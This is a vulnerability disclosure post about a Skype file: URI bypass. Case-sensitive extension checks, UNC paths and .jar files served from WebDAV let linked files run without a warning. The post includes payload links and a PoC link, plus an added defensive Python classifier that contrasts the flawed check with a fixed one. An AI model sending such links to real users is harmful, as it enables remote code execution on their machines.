Part II: Skype File URI Security Bypass Code Execution Vulnerability

It's time to reveal all the information about this vulnerability. I discovered it several months ago, and it was published via iDefense. Not much information was revealed at the time, but the issue was more dangerous than people thought.

Skype applies some security restrictions when a file: URL is sent in a chat conversation. The URL is rendered as a clickable link, and if Skype detects a dangerous extension it shows a warning when the link is clicked. However, the comparison is case-sensitive, so it is very easy to bypass with at least one upper-case character, for example file:cmd.Exe, or with no extension at all: file:cmd.

Even worse, if we add a NetBIOS computer name, file:\\computername\sample.EXE, it will be executed without any warning!

And it gets even better if we use an IP address and a .jar file.
Skype does not check a "file:" link to verify whether it points to a URL with a .jar extension (a Java executable). Once the user clicks the link, the .jar file is executed on the system without any warning from Skype or Windows. This vulnerability can be used for remote code execution if the attacker sends a link pointing to a file on a WebDAV server.

Windows uses two methods to retrieve the file:

a) As a shared folder: the link is treated as a shared folder, and Windows tries to connect over NetBIOS.
b) WebDAV client: Windows Explorer can browse a WebDAV server as a network place. If the first method fails, the integrated WebDAV client is used, allowing the file to be downloaded and executed from a remote WebDAV server.

e.g.: file:\\webdavserver\dav\file.jar
PoC: file:\\\MyDav\myjar.jar
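To make the root cause concrete from the defender's side, here is an added example (my own code, not Skype's) that puts the case-sensitive suffix check the advisory describes beside a normalising classifier that lower-cases the extension, treats a missing extension as suspicious, and flags any link with a host component (NetBIOS name, IP or WebDAV server). The extension list, the regex and the chat lines are constructed for the example; Skype's real list is not given on the page.

```python
import re
from urllib.parse import unquote

# Constructed list for this example; the page does not give Skype's actual list.
DANGEROUS_EXTENSIONS = {"exe", "com", "bat", "cmd", "scr", "pif", "msi", "jar", "vbs", "js"}

# Matches file: links the way a chat client would when linkifying a message (assumed pattern).
FILE_URI_RE = re.compile(r"\bfile:(?P<target>[^\s<>\"']+)", re.IGNORECASE)


def vulnerable_is_dangerous(target: str) -> bool:
    """Case-sensitive suffix check of the kind the advisory describes.
    'cmd.Exe', 'cmd' and any UNC path with upper-case letters all slip past it."""
    return any(target.endswith("." + ext) for ext in DANGEROUS_EXTENSIONS)


def classify(target: str) -> str:
    """Normalise first, then decide: 'remote' for anything with a host component
    (Windows resolves it over SMB and falls back to WebDAV), 'no-extension' when
    there is nothing to compare, 'dangerous' for a listed extension in any case."""
    t = unquote(target).replace("\\", "/").strip()
    if t.startswith("/"):
        host = t.lstrip("/").split("/", 1)[0]
        if not re.fullmatch(r"[A-Za-z]:", host):  # a drive letter is local, anything else is a host
            return "remote"
    name = t.rsplit("/", 1)[-1]
    if "." not in name:
        return "no-extension"
    ext = name.rsplit(".", 1)[-1].lower()  # lower-case before comparing
    return "dangerous" if ext in DANGEROUS_EXTENSIONS else "ok"


def scan_message(text: str) -> list:
    """Every file: link in a chat message with its verdict; anything but 'ok' warrants a warning."""
    return [(m.group("target"), classify(m.group("target"))) for m in FILE_URI_RE.finditer(text)]


# Constructed chat lines mirroring the advisory's cases (hosts and paths are made up).
SAMPLE_CHAT = [
    r"check this file:cmd.Exe quickly",
    r"or this one file:cmd",
    r"shared file:\\computername\sample.EXE",
    r"dav file:\\\MyDav\myjar.jar and file:\\192.0.2.10\share\tool.jar",
    r"my notes file:C:\docs\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_CHAT:
        for target, verdict in scan_message(line):
            print(f"{verdict:13} old check warns: {vulnerable_is_dangerous(target)!s:5} {target}")
```

Only the last sample line comes back as "ok"; every other case the advisory lists is missed by the old check and caught by the normalising one.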

Read the entire advisory for more information: Skype Security Bypass and Remote Code execution vulnerabilities
